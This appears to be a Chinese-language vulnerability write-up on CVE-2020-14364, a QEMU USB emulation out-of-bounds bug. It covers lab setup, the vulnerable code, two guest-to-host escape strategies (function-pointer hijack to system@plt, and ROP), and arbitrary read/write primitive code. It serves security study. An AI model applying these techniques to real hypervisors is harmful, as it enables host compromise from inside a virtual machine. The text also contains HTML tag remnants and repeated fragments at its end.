CVE-2020-14364 QEMU逃逸漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2020-14364是QEMU中的一个USB设备模拟漏洞，存在于QEMU 4.2.1及更早版本中。该漏洞允许虚拟机内的恶意用户通过精心构造的USB数据包实现越界读写，最终可能导致虚拟机逃逸，在宿主机上执行任意代码。<\/p>

环境搭建<\/h2>

制作qcow2虚拟机镜像<\/h3>

qemu-img create -f qcow2 ubuntu-server.qcow2 5G
<\/span><\/span>sudo kvm -m 1028<\/span> -cdrom \/path\/to\/ubuntu-18.04.5-live-server-amd64.iso -drive file=<\/span>ubuntu-server.qcow2,if=<\/span>virtio -net nic,model=<\/span>virtio -net tap,script=<\/span>no -boot d -vnc :0
<\/span><\/span><\/code><\/pre>编译QEMU源码<\/h3>

安装依赖：<\/li>
<\/ol>
wget https:\/\/spice-space.org\/download\/releases\/spice-protocol-0.12.10.tar.bz2
<\/span><\/span>tar xvf spice-protocol-0.12.10.tar.bz2
<\/span><\/span>cd spice-protocol-0.12.10\/
<\/span><\/span>.\/configure 
<\/span><\/span>make
<\/span><\/span>sudo make install
<\/span><\/span>
<\/span><\/span>wget http:\/\/downloads.us.xiph.org\/releases\/celt\/celt-0.5.1.3.tar.gz
<\/span><\/span>tar zxvf celt-0.5.1.3.tar.gz 
<\/span><\/span>cd celt-0.5.1.3\/
<\/span><\/span>.\/configure 
<\/span><\/span>make
<\/span><\/span>sudo make install
<\/span><\/span>
<\/span><\/span>sudo apt install libjpeg-dev libsasl2-dev
<\/span><\/span>
<\/span><\/span>wget https:\/\/spice-space.org\/download\/releases\/spice-server\/spice-0.12.7.tar.bz2
<\/span><\/span>tar xvf spice-0.12.7.tar.bz2
<\/span><\/span>cd spice-0.12.7\/
<\/span><\/span>.\/configure 
<\/span><\/span>make
<\/span><\/span>sudo make install
<\/span><\/span><\/code><\/pre>
编译QEMU：<\/li>
<\/ol>
git clone git:\/\/git.qemu-project.org\/qemu.git
<\/span><\/span>cd qemu
<\/span><\/span>git checkout tags\/v4.2.1
<\/span><\/span>mkdir -p bin\/debug\/naive
<\/span><\/span>cd bin\/debug\/naive
<\/span><\/span>..\/..\/..\/configure --target-list=<\/span>x86_64-softmmu --enable-debug --disable-werror --enable-spice
<\/span><\/span>make
<\/span><\/span><\/code><\/pre>启动脚本<\/h3>
\/home\/osboxes\/study\/vul\/qemu-14364\/src\/qemu\/bin\/debug\/naive\/x86_64-softmmu\/qemu-system-x86_64 \
<\/span><\/span><\/span><\/span>    -machine q35 \
<\/span><\/span><\/span><\/span>    -m 1G \
<\/span><\/span><\/span><\/span>    -hda ubuntu-server.qcow2 \
<\/span><\/span><\/span><\/span>    -device e1000,netdev=<\/span>net0 \
<\/span><\/span><\/span><\/span>    -netdev user,id=<\/span>net0,hostfwd=<\/span>tcp::5555-:22 \
<\/span><\/span><\/span><\/span>    -enable-kvm \
<\/span><\/span><\/span><\/span>    -usb \
<\/span><\/span><\/span><\/span>    -drive if<\/span>=<\/span>none,format=<\/span>raw,id=<\/span>disk1,file=<\/span>\/home\/osboxes\/study\/vul\/qemu-14364\/disk_01.img \
<\/span><\/span><\/span><\/span>    -device usb-storage,drive=<\/span>disk1 \
<\/span><\/span><\/span><\/span>    -device qxl-vga
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
关键数据结构<\/h3>
struct<\/span> USBDevice {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    uint8_t<\/span> setup_buf[8<\/span>];
<\/span><\/span>    uint8_t<\/span> data_buf[4096<\/span>];  \/\/ 固定大小的缓冲区
<\/span><\/span><\/span><\/span>    int32_t<\/span> setup_state;
<\/span><\/span>    int32_t<\/span> setup_len;       \/\/ 可被控制的长度
<\/span><\/span><\/span><\/span>    int32_t<\/span> setup_index;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>漏洞点<\/h3>
漏洞位于hw\/usb\/core.c<\/code>的do_token_setup<\/code>函数中：<\/p>
static<\/span> void<\/span> do_token_setup<\/span>(USBDevice *<\/span>s, USBPacket *<\/span>p) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    s-><\/span>setup_len =<\/span> (s-><\/span>setup_buf[7<\/span>] <<<\/span> 8<\/span>) |<\/span> s-><\/span>setup_buf[6<\/span>];  \/\/ [1] 用户可控的长度
<\/span><\/span><\/span><\/span>    if<\/span> (s-><\/span>setup_len ><\/span> sizeof<\/span>(s-><\/span>data_buf)) {                  \/\/ [2] 检查但未修正
<\/span><\/span><\/span><\/span>        fprintf(stderr, "usb_generic_handle_packet: ctrl buffer too small (%d > %zu)<\/span>\n<\/span>"<\/span>,
<\/span><\/span>                s-><\/span>setup_len, sizeof<\/span>(s-><\/span>data_buf));
<\/span><\/span>        p-><\/span>status =<\/span> USB_RET_STALL;
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>随后在do_token_in<\/code>和do_token_out<\/code>函数中使用这个长度进行内存操作：<\/p>
static<\/span> void<\/span> do_token_in<\/span>(USBDevice *<\/span>s, USBPacket *<\/span>p) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    case<\/span> SETUP_STATE_DATA:
<\/span><\/span>        if<\/span> (s-><\/span>setup_buf[0<\/span>] &<\/span> USB_DIR_IN) {
<\/span><\/span>            int<\/span> len =<\/span> s-><\/span>setup_len -<\/span> s-><\/span>setup_index;  \/\/ [3] 计算长度
<\/span><\/span><\/span><\/span>            if<\/span> (len ><\/span> p-><\/span>iov.size) {
<\/span><\/span>                len =<\/span> p-><\/span>iov.size;
<\/span><\/span>            }
<\/span><\/span>            usb_packet_copy(p, s-><\/span>data_buf +<\/span> s-><\/span>setup_index, len);  \/\/ [4] 越界读
<\/span><\/span><\/span><\/span>            \/\/ ...
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
利用思路一：通过IRQ劫持控制流<\/h3>


设置漏洞触发环境<\/strong><\/p>

映射USB设备内存<\/li>
设置EHCIState结构中的opreg基地址<\/li>
<\/ul>
<\/li>

越界读<\/strong><\/p>

通过控制setup_len<\/code>和setup_index<\/code>实现任意地址读取<\/li>
泄露USBDevice对象地址和其他关键数据结构地址<\/li>
<\/ul>
<\/li>

越界写<\/strong><\/p>

修改EHCIState->irq指针<\/li>
伪造IRQState结构，将handler设置为system@plt<\/li>
<\/ul>
<\/li>

触发执行<\/strong><\/p>

通过mmio读写触发ehci_update_irq<\/li>
最终执行system("xcalc")<\/li>
<\/ul>
<\/li>
<\/ol>
利用思路二：通过PCI配置劫持控制流<\/h3>


泄露关键地址<\/strong><\/p>

通过越界读获取USBDevice对象地址<\/li>
查找"qxl-vga"字符串定位PCIDevice结构<\/li>
<\/ul>
<\/li>

修改函数指针<\/strong><\/p>

覆盖PCIDevice->config_read为system@plt<\/li>
在虚拟机内读取pci配置寄存器触发<\/li>
<\/ul>
<\/li>

ROP利用<\/strong><\/p>

当直接调用遇到参数问题时，使用ROP链<\/li>
包含栈切换和参数设置<\/li>
<\/ul>
<\/li>
<\/ol>
利用代码关键部分<\/h2>
任意读原语实现<\/h3>
unsigned<\/span> long<\/span> arb_read<\/span>(uint64_t<\/span> target_addr) {
<\/span><\/span>    setup_state_data();
<\/span><\/span>    set_length(0x1010<\/span>, USB_DIR_OUT);
<\/span><\/span>    
<\/span><\/span>    \/\/ 第一次写：设置setup_index为0xfffffff8-0x1010
<\/span><\/span><\/span><\/span>    do_copy_write(0<\/span>, 0x1010<\/span>, 0xfffffff8<\/span>-<\/span>0x1010<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 第二次写：覆盖setup字段
<\/span><\/span><\/span><\/span>    *<\/span>(unsigned<\/span> long<\/span> *<\/span>)(data_buf) =<\/span> 0x2000000000000080<\/span>; \/\/ setup[0] = USB_DIR_IN
<\/span><\/span><\/span><\/span>    unsigned<\/span> int<\/span> target_offset =<\/span> target_addr -<\/span> data_buf_addr;
<\/span><\/span>    do_copy_write(0x8<\/span>, 0xffff<\/span>, target_offset -<\/span> 0x1018<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行读操作
<\/span><\/span><\/span><\/span>    do_copy_read();
<\/span><\/span>    return<\/span> *<\/span>(unsigned<\/span> long<\/span> *<\/span>)(data_buf);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>任意写原语实现<\/h3>
void<\/span> arb_write<\/span>(uint64_t<\/span> target_addr, uint64_t<\/span> payload) {
<\/span><\/span>    setup_state_data();
<\/span><\/span>    set_length(0x1010<\/span>, USB_DIR_OUT);
<\/span><\/span>    
<\/span><\/span>    \/\/ 计算偏移
<\/span><\/span><\/span><\/span>    unsigned<\/span> long<\/span> offset =<\/span> target_addr -<\/span> data_buf_addr;
<\/span><\/span>    
<\/span><\/span>    \/\/ 第一次写：设置setup_len和setup_index
<\/span><\/span><\/span><\/span>    do_copy_write(0<\/span>, offset+<\/span>0x8<\/span>, offset-<\/span>0x1010<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 第二次写：写入payload
<\/span><\/span><\/span><\/span>    *<\/span>(unsigned<\/span> long<\/span> *<\/span>)(data_buf) =<\/span> payload;
<\/span><\/span>    do_copy_write(0<\/span>, 0xffff<\/span>, 0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>参考链接<\/h2>

FreeBuf漏洞分析文章<\/a><\/li>
360漏洞分析文章<\/a><\/li>
QEMU虚拟地址转物理地址<\/a><\/li>
<\/ol>
总结<\/h2>
CVE-2020-14364漏洞利用的关键在于：<\/p>

通过控制USB协议中的长度字段实现越界读写<\/li>
泄露关键数据结构地址构建利用原语<\/li>
通过劫持函数指针或构造ROP链实现代码执行<\/li>
两种利用思路分别针对不同的QEMU组件（EHCI IRQ和PCI配置）<\/li>
<\/ol>
漏洞修复方案是确保setup_len<\/code>不超过data_buf<\/code>大小并正确重置，后续QEMU版本已修复此问题。<\/p>

CVE-2020-14364 QEMU逃逸漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2020-14364是QEMU中的一个USB设备模拟漏洞，存在于QEMU 4.2.1及更早版本中。该漏洞允许虚拟机内的恶意用户通过精心构造的USB数据包实现越界读写，最终可能导致虚拟机逃逸，在宿主机上执行任意代码。<\/p>

环境搭建<\/h2>

漏洞分析<\/h2>

漏洞利用<\/h2>

利用代码关键部分<\/h2>

漏洞概述<\/h2>
CVE-2020-14364是QEMU中的一个USB设备模拟漏洞，存在于QEMU 4.2.1及更早版本中。该漏洞允许虚拟机内的恶意用户通过精心构造的USB数据包实现越界读写，最终可能导致虚拟机逃逸，在宿主机上执行任意代码。<\/p>